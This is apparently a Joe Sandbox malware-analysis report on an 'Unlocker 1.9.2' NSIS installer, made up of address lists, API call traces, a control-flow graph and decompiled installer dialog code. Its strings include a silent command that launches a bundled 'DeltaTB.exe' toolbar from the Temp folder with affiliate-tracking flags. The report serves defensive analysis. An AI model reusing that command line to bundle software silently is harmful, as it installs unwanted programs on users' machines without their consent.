                                                                                                                                                              0x00403134
                                                                                                                                                              0x00403139
                                                                                                                                                              0x0040313f
                                                                                                                                                              0x00403146
                                                                                                                                                              0x00403159
                                                                                                                                                              0x0040315e
                                                                                                                                                              0x00403160
                                                                                                                                                              0x00403162
                                                                                                                                                              0x00403167
                                                                                                                                                              0x00403167
                                                                                                                                                              0x00403177
                                                                                                                                                              0x0040317d
                                                                                                                                                              0x004031e6
                                                                                                                                                              0x004031e6
                                                                                                                                                              0x004031e8
                                                                                                                                                              0x004031ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403183
                                                                                                                                                              0x00403186
                                                                                                                                                              0x0040318e
                                                                                                                                                              0x0040318e
                                                                                                                                                              0x00403191
                                                                                                                                                              0x00403196
                                                                                                                                                              0x00403198
                                                                                                                                                              0x00403198
                                                                                                                                                              0x00403199
                                                                                                                                                              0x00403199
                                                                                                                                                              0x0040319e
                                                                                                                                                              0x004031a1
                                                                                                                                                              0x004031d6
                                                                                                                                                              0x004031db
                                                                                                                                                              0x004031e0
                                                                                                                                                              0x004031e3
                                                                                                                                                              0x004031e5
                                                                                                                                                              0x004031e5
                                                                                                                                                              0x004031e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004031a3
                                                                                                                                                              0x004031a3
                                                                                                                                                              0x004031a4
                                                                                                                                                              0x004031a7
                                                                                                                                                              0x004031af
                                                                                                                                                              0x004031b2
                                                                                                                                                              0x004031b4
                                                                                                                                                              0x004031b4
                                                                                                                                                              0x004031b4
                                                                                                                                                              0x004031b2
                                                                                                                                                              0x004031b7
                                                                                                                                                              0x004031bd
                                                                                                                                                              0x004031c5
                                                                                                                                                              0x004031c8
                                                                                                                                                              0x004031ca
                                                                                                                                                              0x004031ca
                                                                                                                                                              0x004031ca
                                                                                                                                                              0x004031c8
                                                                                                                                                              0x004031cd
                                                                                                                                                              0x004031d4
                                                                                                                                                              0x004031ee
                                                                                                                                                              0x004031f1
                                                                                                                                                              0x004031f1
                                                                                                                                                              0x004031fa
                                                                                                                                                              0x004031ff
                                                                                                                                                              0x004031ff
                                                                                                                                                              0x0040320a
                                                                                                                                                              0x00403210
                                                                                                                                                              0x00403215
                                                                                                                                                              0x00403217
                                                                                                                                                              0x00403239
                                                                                                                                                              0x0040323e
                                                                                                                                                              0x00403245
                                                                                                                                                              0x0040324c
                                                                                                                                                              0x00403250
                                                                                                                                                              0x004032b7
                                                                                                                                                              0x004032b7
                                                                                                                                                              0x004032bc
                                                                                                                                                              0x004032c6
                                                                                                                                                              0x004033b1
                                                                                                                                                              0x004033b7
                                                                                                                                                              0x004033c2
                                                                                                                                                              0x004033cb
                                                                                                                                                              0x004033cd
                                                                                                                                                              0x004033d2
                                                                                                                                                              0x004033d4
                                                                                                                                                              0x004033d6
                                                                                                                                                              0x004033d8
                                                                                                                                                              0x004033da
                                                                                                                                                              0x004033dc
                                                                                                                                                              0x004033de
                                                                                                                                                              0x004033ee
                                                                                                                                                              0x004033f0
                                                                                                                                                              0x004033f2
                                                                                                                                                              0x004033ff
                                                                                                                                                              0x0040340e
                                                                                                                                                              0x00403416
                                                                                                                                                              0x0040341e
                                                                                                                                                              0x0040341e
                                                                                                                                                              0x004033f2
                                                                                                                                                              0x004033de
                                                                                                                                                              0x004033da
                                                                                                                                                              0x00403423
                                                                                                                                                              0x00403429
                                                                                                                                                              0x0040342b
                                                                                                                                                              0x0040342f
                                                                                                                                                              0x0040342f
                                                                                                                                                              0x0040342b
                                                                                                                                                              0x00403434
                                                                                                                                                              0x00403439
                                                                                                                                                              0x0040343c
                                                                                                                                                              0x0040343e
                                                                                                                                                              0x0040343e
                                                                                                                                                              0x00403446
                                                                                                                                                              0x00403446
                                                                                                                                                              0x004032d5
                                                                                                                                                              0x004032dc
                                                                                                                                                              0x004032dc
                                                                                                                                                              0x00403252
                                                                                                                                                              0x00403258
                                                                                                                                                              0x004032a7
                                                                                                                                                              0x004032a7
                                                                                                                                                              0x004032b3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004032b3
                                                                                                                                                              0x00403261
                                                                                                                                                              0x0040326e
                                                                                                                                                              0x00403265
                                                                                                                                                              0x0040326b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x0040326d
                                                                                                                                                              0x00403272
                                                                                                                                                              0x00403274
                                                                                                                                                              0x0040327c
                                                                                                                                                              0x004032e8
                                                                                                                                                              0x004032ed
                                                                                                                                                              0x004032fc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403300
                                                                                                                                                              0x00403307
                                                                                                                                                              0x0040330d
                                                                                                                                                              0x00403313
                                                                                                                                                              0x0040331b
                                                                                                                                                              0x0040331b
                                                                                                                                                              0x00403329
                                                                                                                                                              0x00403330
                                                                                                                                                              0x00403339
                                                                                                                                                              0x0040333f
                                                                                                                                                              0x0040333f
                                                                                                                                                              0x0040334b
                                                                                                                                                              0x00403351
                                                                                                                                                              0x0040335b
                                                                                                                                                              0x0040336f
                                                                                                                                                              0x00403370
                                                                                                                                                              0x00403371
                                                                                                                                                              0x00403376
                                                                                                                                                              0x00403382
                                                                                                                                                              0x00403388
                                                                                                                                                              0x0040338f
                                                                                                                                                              0x00403392
                                                                                                                                                              0x00403398
                                                                                                                                                              0x00403398
                                                                                                                                                              0x0040338f
                                                                                                                                                              0x0040339c
                                                                                                                                                              0x004033a2
                                                                                                                                                              0x004033a2
                                                                                                                                                              0x004033a5
                                                                                                                                                              0x004033a6
                                                                                                                                                              0x004033a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004033a7
                                                                                                                                                              0x0040327e
                                                                                                                                                              0x00403280
                                                                                                                                                              0x0040328b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403293
                                                                                                                                                              0x0040329e
                                                                                                                                                              0x004032a3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004032a3
                                                                                                                                                              0x0040321f
                                                                                                                                                              0x0040322b
                                                                                                                                                              0x00403230
                                                                                                                                                              0x00403235
                                                                                                                                                              0x00403237
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403237
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004031d4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00403189
                                                                                                                                                              0x00403189
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403188
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • #17.COMCTL32 ref: 004030EA
                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                              • GetCommandLineA.KERNEL32(Unlocker 1.9.2 Setup,NSIS Error), ref: 00403139
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040314C
                                                                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000020), ref: 00403177
                                                                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 004032B7
                                                                                                                                                              • OleUninitialize.OLE32(00000000), ref: 004032BC
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004032DC
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000), ref: 004032E8
                                                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,00000000), ref: 004032F4
                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                                                                                              • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\Unlocker1.9.2.exe,0041F030,00000001), ref: 00403365
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403446
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt$"C:\Users\user\Desktop\Unlocker1.9.2.exe"$1033$C:\Program Files\Unlocker$C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Unlocker1.9.2.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$Unlocker 1.9.2 Setup$\Temp$~nsu.tmp
                                                                                                                                                              • API String ID: 553446912-2407670037
                                                                                                                                                              • Opcode ID: a19d3eb581d25ceee7db0395522459586b67666d40a4dd21a24ca1e1399dfb9b
                                                                                                                                                              • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                                                                                                                                              • Opcode Fuzzy Hash: a19d3eb581d25ceee7db0395522459586b67666d40a4dd21a24ca1e1399dfb9b
                                                                                                                                                              • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00404EB9 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 106 404eb9-404ed4 107 405065-40506c 106->107 108 404eda-404fa3 GetDlgItem * 3 call 403dc4 call 40461d GetClientRect GetSystemMetrics SendMessageA * 2 106->108 110 405096-4050a3 107->110 111 40506e-405090 GetDlgItem CreateThread CloseHandle 107->111 126 404fc1-404fc4 108->126 127 404fa5-404fbf SendMessageA * 2 108->127 112 4050c1-4050c8 110->112 113 4050a5-4050ab 110->113 111->110 117 4050ca-4050d0 112->117 118 40511f-405123 112->118 115 4050e3-4050ec call 403df6 113->115 116 4050ad-4050bc ShowWindow * 2 call 403dc4 113->116 130 4050f1-4050f5 115->130 116->112 122 4050d2-4050de call 403d68 117->122 123 4050f8-405108 ShowWindow 117->123 118->115 120 405125-405128 118->120 120->115 128 40512a-40513d SendMessageA 120->128 122->115 131 405118-40511a call 403d68 123->131 132 40510a-405113 call 404d7b 123->132 133 404fd4-404feb call 403d8f 126->133 134 404fc6-404fd2 SendMessageA 126->134 127->126 135 405143-405164 CreatePopupMenu call 4059ff AppendMenuA 128->135 136 405236-405238 128->136 131->118 132->131 145 405021-405042 GetDlgItem SendMessageA 133->145 146 404fed-405001 ShowWindow 133->146 134->133 143 405166-405177 GetWindowRect 135->143 144 405179-40517f 135->144 136->130 147 405182-40519a TrackPopupMenu 143->147 144->147 145->136 150 405048-405060 SendMessageA * 2 145->150 148 405010 146->148 149 405003-40500e ShowWindow 146->149 147->136 151 4051a0-4051b7 147->151 152 405016-40501c call 403dc4 148->152 149->152 150->136 153 4051bc-4051d7 SendMessageA 151->153 152->145 153->153 155 4051d9-4051f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 153->155 156 4051fb-40521a SendMessageA 155->156 156->156 157 40521c-405230 GlobalUnlock SetClipboardData CloseClipboard 156->157 157->136
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00404EB9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				void* _t120;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423664; // 0x403f4
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t120 = CreateThread(0, 0, E00404E4D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t120);
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E004059FF(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420478;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42364c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423e88, 8);
							__eflags =  *0x423f0c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc48; // 0x73f11c
								E00404D7B( *((intOrPtr*)(_t112 + 0x34)), _t149); // executed
							}
							E00403D68(1);
							goto L25;
						}
						 *0x41f840 = 2;
						E00403D68(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403DF6(_a8, _a12, _a16);
						}
						ShowWindow( *0x423650, _t149);
						ShowWindow(_t154, 8);
						E00403DC4(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423e90; // 0x73eeb0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423650 = GetDlgItem(_a4, 0x403);
				 *0x423648 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423664 = _t127;
				_v8 = _t127;
				E00403DC4( *0x423650);
				 *0x423654 = E0040461D(4);
				 *0x42366c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403D8F(_a4);
				if(( *0x423e98 & 0x00000003) != 0) {
					ShowWindow( *0x423650, _t149); // executed
					if(( *0x423e98 & 0x00000002) != 0) {
						 *0x423650 = _t149;
					} else {
						ShowWindow(_v8, 8); // executed
					}
					E00403DC4( *0x423648);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423e98 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}




































                                                                                                                                                              0x00404ec2
                                                                                                                                                              0x00404ec8
                                                                                                                                                              0x00404ed1
                                                                                                                                                              0x00404ed4
                                                                                                                                                              0x00405065
                                                                                                                                                              0x0040506c
                                                                                                                                                              0x00405089
                                                                                                                                                              0x00405090
                                                                                                                                                              0x00405090
                                                                                                                                                              0x00405096
                                                                                                                                                              0x004050a3
                                                                                                                                                              0x004050c1
                                                                                                                                                              0x004050c1
                                                                                                                                                              0x004050c8
                                                                                                                                                              0x0040511f
                                                                                                                                                              0x0040511f
                                                                                                                                                              0x00405123
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405125
                                                                                                                                                              0x00405128
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405132
                                                                                                                                                              0x00405138
                                                                                                                                                              0x0040513a
                                                                                                                                                              0x0040513d
                                                                                                                                                              0x00405236
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405236
                                                                                                                                                              0x0040514c
                                                                                                                                                              0x00405158
                                                                                                                                                              0x0040515e
                                                                                                                                                              0x00405161
                                                                                                                                                              0x00405164
                                                                                                                                                              0x00405179
                                                                                                                                                              0x0040517c
                                                                                                                                                              0x0040517c
                                                                                                                                                              0x0040517f
                                                                                                                                                              0x00405166
                                                                                                                                                              0x0040516b
                                                                                                                                                              0x00405171
                                                                                                                                                              0x00405174
                                                                                                                                                              0x00405174
                                                                                                                                                              0x0040518f
                                                                                                                                                              0x00405197
                                                                                                                                                              0x00405198
                                                                                                                                                              0x0040519a
                                                                                                                                                              0x004051a3
                                                                                                                                                              0x004051a6
                                                                                                                                                              0x004051ad
                                                                                                                                                              0x004051b4
                                                                                                                                                              0x004051bc
                                                                                                                                                              0x004051bc
                                                                                                                                                              0x004051ca
                                                                                                                                                              0x004051d0
                                                                                                                                                              0x004051d3
                                                                                                                                                              0x004051d3
                                                                                                                                                              0x004051da
                                                                                                                                                              0x004051e0
                                                                                                                                                              0x004051e9
                                                                                                                                                              0x004051f0
                                                                                                                                                              0x004051f9
                                                                                                                                                              0x004051fb
                                                                                                                                                              0x004051fe
                                                                                                                                                              0x0040520d
                                                                                                                                                              0x0040520f
                                                                                                                                                              0x00405215
                                                                                                                                                              0x00405216
                                                                                                                                                              0x00405217
                                                                                                                                                              0x00405217
                                                                                                                                                              0x0040521f
                                                                                                                                                              0x0040522a
                                                                                                                                                              0x00405230
                                                                                                                                                              0x00405230
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040519a
                                                                                                                                                              0x004050ca
                                                                                                                                                              0x004050d0
                                                                                                                                                              0x00405100
                                                                                                                                                              0x00405102
                                                                                                                                                              0x00405108
                                                                                                                                                              0x0040510a
                                                                                                                                                              0x00405113
                                                                                                                                                              0x00405113
                                                                                                                                                              0x0040511a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040511a
                                                                                                                                                              0x004050d4
                                                                                                                                                              0x004050de
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004050a5
                                                                                                                                                              0x004050a5
                                                                                                                                                              0x004050ab
                                                                                                                                                              0x004050e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004050ec
                                                                                                                                                              0x004050b4
                                                                                                                                                              0x004050b9
                                                                                                                                                              0x004050bc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004050bc
                                                                                                                                                              0x004050a3
                                                                                                                                                              0x00404eda
                                                                                                                                                              0x00404ede
                                                                                                                                                              0x00404ee7
                                                                                                                                                              0x00404eee
                                                                                                                                                              0x00404ef1
                                                                                                                                                              0x00404ef4
                                                                                                                                                              0x00404ef7
                                                                                                                                                              0x00404ef8
                                                                                                                                                              0x00404ef9
                                                                                                                                                              0x00404f12
                                                                                                                                                              0x00404f15
                                                                                                                                                              0x00404f1f
                                                                                                                                                              0x00404f2e
                                                                                                                                                              0x00404f36
                                                                                                                                                              0x00404f3e
                                                                                                                                                              0x00404f43
                                                                                                                                                              0x00404f46
                                                                                                                                                              0x00404f52
                                                                                                                                                              0x00404f5b
                                                                                                                                                              0x00404f64
                                                                                                                                                              0x00404f87
                                                                                                                                                              0x00404f8d
                                                                                                                                                              0x00404f9e
                                                                                                                                                              0x00404fa3
                                                                                                                                                              0x00404fb1
                                                                                                                                                              0x00404fbf
                                                                                                                                                              0x00404fbf
                                                                                                                                                              0x00404fc4
                                                                                                                                                              0x00404fd2
                                                                                                                                                              0x00404fd2
                                                                                                                                                              0x00404fd7
                                                                                                                                                              0x00404fda
                                                                                                                                                              0x00404fdf
                                                                                                                                                              0x00404feb
                                                                                                                                                              0x00404ff4
                                                                                                                                                              0x00405001
                                                                                                                                                              0x00405010
                                                                                                                                                              0x00405003
                                                                                                                                                              0x00405008
                                                                                                                                                              0x00405008
                                                                                                                                                              0x0040501c
                                                                                                                                                              0x0040501c
                                                                                                                                                              0x00405030
                                                                                                                                                              0x00405039
                                                                                                                                                              0x00405042
                                                                                                                                                              0x00405052
                                                                                                                                                              0x0040505e
                                                                                                                                                              0x0040505e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F18
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F27
                                                                                                                                                              • GetClientRect.USER32 ref: 00404F64
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00404F6C
                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                                                                                              • GetDlgItem.USER32 ref: 00405029
                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F36
                                                                                                                                                                • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040507B
                                                                                                                                                              • CreateThread.KERNELBASE ref: 00405089
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                                                                                              • ShowWindow.USER32(000403F4,00000008), ref: 004050B9
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405100
                                                                                                                                                              • SendMessageA.USER32(000403F4,00001004,00000000,00000000), ref: 00405132
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405143
                                                                                                                                                              • AppendMenuA.USER32 ref: 00405158
                                                                                                                                                              • GetWindowRect.USER32 ref: 0040516B
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051E0
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                                                                                              • GlobalLock.KERNEL32 ref: 004051F3
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040521F
                                                                                                                                                              • SetClipboardData.USER32 ref: 0040522A
                                                                                                                                                              • CloseClipboard.USER32 ref: 00405230
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID: {
                                                                                                                                                              • API String ID: 590372296-366298937
